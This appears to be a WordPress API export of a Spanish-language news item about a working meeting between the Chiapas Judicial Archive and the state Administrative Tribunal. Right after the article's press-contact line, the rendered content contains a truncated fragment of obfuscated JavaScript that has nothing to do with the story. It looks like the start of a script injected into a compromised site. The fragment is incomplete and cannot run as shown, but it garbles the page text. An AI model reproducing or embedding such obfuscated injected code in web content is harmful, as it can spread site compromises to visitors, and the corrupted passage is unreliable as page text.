{"id":4734,"date":"2022-08-27T06:39:08","date_gmt":"2022-08-27T06:39:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4734"},"modified":"2022-08-27T06:39:08","modified_gmt":"2022-08-27T06:39:08","slug":"se-reunen-archivo-judicial-del-poder-judicial-y-del-tribunal-administrativo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4734","title":{"rendered":"Se re\u00fanen Archivo Judicial del Poder Judicial y del Tribunal Administrativo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"943\" height=\"1018\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-26-at-5.44.05-PM.jpeg\" alt=\"\" class=\"wp-image-4735\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-26-at-5.44.05-PM.jpeg 943w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-26-at-5.44.05-PM-278x300.jpeg 278w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-26-at-5.44.05-PM-768x829.jpeg 768w\" sizes=\"auto, (max-width: 943px) 100vw, 943px\" \/><\/figure>\n\n\n\n<p>26 de Agosto del.2022. Tuxtla Guti\u00e9rrez. &#8211; El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Archivo Judicial, contin\u00faa atendiendo la investigaci\u00f3n documental y reposicionando el ejercicio hist\u00f3rico de la impartici\u00f3n de justicia.En este marco, la directora del Archivo Judicial, Ana Laura Romero Basurto, atendiendo las instrucciones del magistrado presidente del Poder Judicial, Guillermo Ramos P\u00e9rez, sostuvo una reuni\u00f3n de trabajo con integrantes del Tribunal Administrativo del Estado, en las instalaciones del Archivo Judicial ubicadas en el municipio de Berrioz\u00e1bal.En la reuni\u00f3n de trabajo asistieron el magistrado titular de la Ponencia C de la Sala de Revisi\u00f3n, y a la vez presidente del Comit\u00e9 de Archivo del Tribunal Administrativo, V\u00edctor Marcelo Ru\u00edz Reyna, y la jefa del \u00c1rea Coordinadora de Archivos del Tribunal Administrativo del Poder Judicial del Estado, Fabiola Simuta Sandoval, quien se encargar\u00e1 de la gesti\u00f3n archiv\u00edstica de dicho tribunal.As\u00ed mismo, como parte de los trabajos, se buscar\u00e1 la colaboraci\u00f3n para que la Direcci\u00f3n General del Archivo Judicial, incluya al Tribunal Administrativo, en el programa de capacitaci\u00f3n archiv\u00edstica.Con este ejercicio, se robustecen las acciones que buscan eficientar y contribuir con el car\u00e1cter de ayuda interinstitucional, con la finalidad de brindar una atenci\u00f3n de calidad en ambas instituciones en beneficio de las y los chiapanecos.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>26 de Agosto del.2022. Tuxtla Guti\u00e9rrez. &#8211; El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Archivo Judicial, contin\u00faa atendiendo la investigaci\u00f3n documental y reposicionando el ejercicio hist\u00f3rico de la impartici\u00f3n de justicia.En este marco, la directora del Archivo Judicial, Ana Laura Romero Basurto, atendiendo las instrucciones del magistrado presidente del Poder Judicial, Guillermo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4735,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4734","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4734","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4734"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4734\/revisions"}],"predecessor-version":[{"id":4736,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4734\/revisions\/4736"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4735"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4734"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4734"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4734"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}